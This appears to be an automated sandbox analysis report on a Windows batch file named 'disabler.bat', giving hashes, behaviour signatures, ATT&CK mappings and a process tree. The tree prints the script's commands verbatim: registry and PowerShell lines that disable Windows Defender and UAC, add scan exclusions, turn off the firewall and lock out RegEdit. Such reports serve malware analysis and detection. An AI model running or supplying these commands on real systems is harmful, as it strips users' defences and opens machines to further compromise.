Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/01/2025, 05:12
Static task
static1
Behavioral task
behavioral1
Sample
disabler.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
disabler.bat
Resource
win10v2004-20241007-en
General
-
Target
disabler.bat
-
Size
2KB
-
MD5
c6aff26267067b25326560e96a81513f
-
SHA1
e45b8c290c2e9cf625ce255f6d31dda440e3d61e
-
SHA256
c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79
-
SHA512
d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2612 powershell.exe 2852 powershell.exe 2728 powershell.exe 812 powershell.exe 3048 powershell.exe 2800 powershell.exe 1648 powershell.exe 1100 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1996 netsh.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2852 powershell.exe 2612 powershell.exe 2728 powershell.exe 812 powershell.exe 3048 powershell.exe 2800 powershell.exe 1648 powershell.exe 1100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2404 wrote to memory of 2764 2404 cmd.exe 32 PID 2404 wrote to memory of 2764 2404 cmd.exe 32 PID 2404 wrote to memory of 2764 2404 cmd.exe 32 PID 2764 wrote to memory of 2768 2764 net.exe 33 PID 2764 wrote to memory of 2768 2764 net.exe 33 PID 2764 wrote to memory of 2768 2764 net.exe 33 PID 2404 wrote to memory of 2824 2404 cmd.exe 34 PID 2404 wrote to memory of 2824 2404 cmd.exe 34 PID 2404 wrote to memory of 2824 2404 cmd.exe 34 PID 2404 wrote to memory of 2760 2404 cmd.exe 35 PID 2404 wrote to memory of 2760 2404 cmd.exe 35 PID 2404 wrote to memory of 2760 2404 cmd.exe 35 PID 2404 wrote to memory of 2688 2404 cmd.exe 36 PID 2404 wrote to memory of 2688 2404 cmd.exe 36 PID 2404 wrote to memory of 2688 2404 cmd.exe 36 PID 2404 wrote to memory of 2692 2404 cmd.exe 37 PID 2404 wrote to memory of 2692 2404 cmd.exe 37 PID 2404 wrote to memory of 2692 2404 cmd.exe 37 PID 2404 wrote to memory of 2244 2404 cmd.exe 38 PID 2404 wrote to memory of 2244 2404 cmd.exe 38 PID 2404 wrote to memory of 2244 2404 cmd.exe 38 PID 2404 wrote to memory of 2976 2404 cmd.exe 39 PID 2404 wrote to memory of 2976 2404 cmd.exe 39 PID 2404 wrote to memory of 2976 2404 cmd.exe 39 PID 2404 wrote to memory of 2852 2404 cmd.exe 40 PID 2404 wrote to memory of 2852 2404 cmd.exe 40 PID 2404 wrote to memory of 2852 2404 cmd.exe 40 PID 2404 wrote to memory of 2612 2404 cmd.exe 41 PID 2404 wrote to memory of 2612 2404 cmd.exe 41 PID 2404 wrote to memory of 2612 2404 cmd.exe 41 PID 2404 wrote to memory of 2728 2404 cmd.exe 42 PID 2404 wrote to memory of 2728 2404 cmd.exe 42 PID 2404 wrote to memory of 2728 2404 cmd.exe 42 PID 2404 wrote to memory of 812 2404 cmd.exe 43 PID 2404 wrote to memory of 812 2404 cmd.exe 43 PID 2404 wrote to memory of 812 2404 cmd.exe 43 PID 2404 wrote to memory of 3048 2404 cmd.exe 44 PID 2404 wrote to memory of 3048 2404 cmd.exe 44 PID 2404 wrote to memory of 3048 2404 cmd.exe 44 PID 2404 wrote to memory of 2800 2404 cmd.exe 45 PID 2404 wrote to memory of 2800 2404 cmd.exe 45 PID 2404 wrote to memory of 2800 2404 cmd.exe 45 PID 2404 wrote to memory of 1648 2404 cmd.exe 46 PID 2404 wrote to memory of 1648 2404 cmd.exe 46 PID 2404 wrote to memory of 1648 2404 cmd.exe 46 PID 2404 wrote to memory of 1100 2404 cmd.exe 47 PID 2404 wrote to memory of 1100 2404 cmd.exe 47 PID 2404 wrote to memory of 1100 2404 cmd.exe 47 PID 2404 wrote to memory of 1996 2404 cmd.exe 48 PID 2404 wrote to memory of 1996 2404 cmd.exe 48 PID 2404 wrote to memory of 1996 2404 cmd.exe 48 PID 2404 wrote to memory of 548 2404 cmd.exe 49 PID 2404 wrote to memory of 548 2404 cmd.exe 49 PID 2404 wrote to memory of 548 2404 cmd.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2768
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:2824
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f2⤵PID:2760
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f2⤵PID:2688
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f2⤵PID:2692
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f2⤵PID:2244
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f2⤵PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -PUAProtection Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -HighThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -LowThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -ScanScheduleDay 8"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1996
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f2⤵
- Disables RegEdit via registry modification
PID:548
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ba82edd25c65cb9256d9250fdc1ef4df
SHA1dc079b101d43a9f11f4dc0db060aefbe9b05c05e
SHA256915a13ceb17014ef3cf432157a2c88bc019a2129bf43015750bc86d1b5080a08
SHA512d1d6c8b9c468412c65fc6fbac90f69db30e7363c22340cc7f9f9a5840a30ad0d503dfbd2734ba0a997eeec90ad78ec983541afffe31a9fba497dc653ccaa2433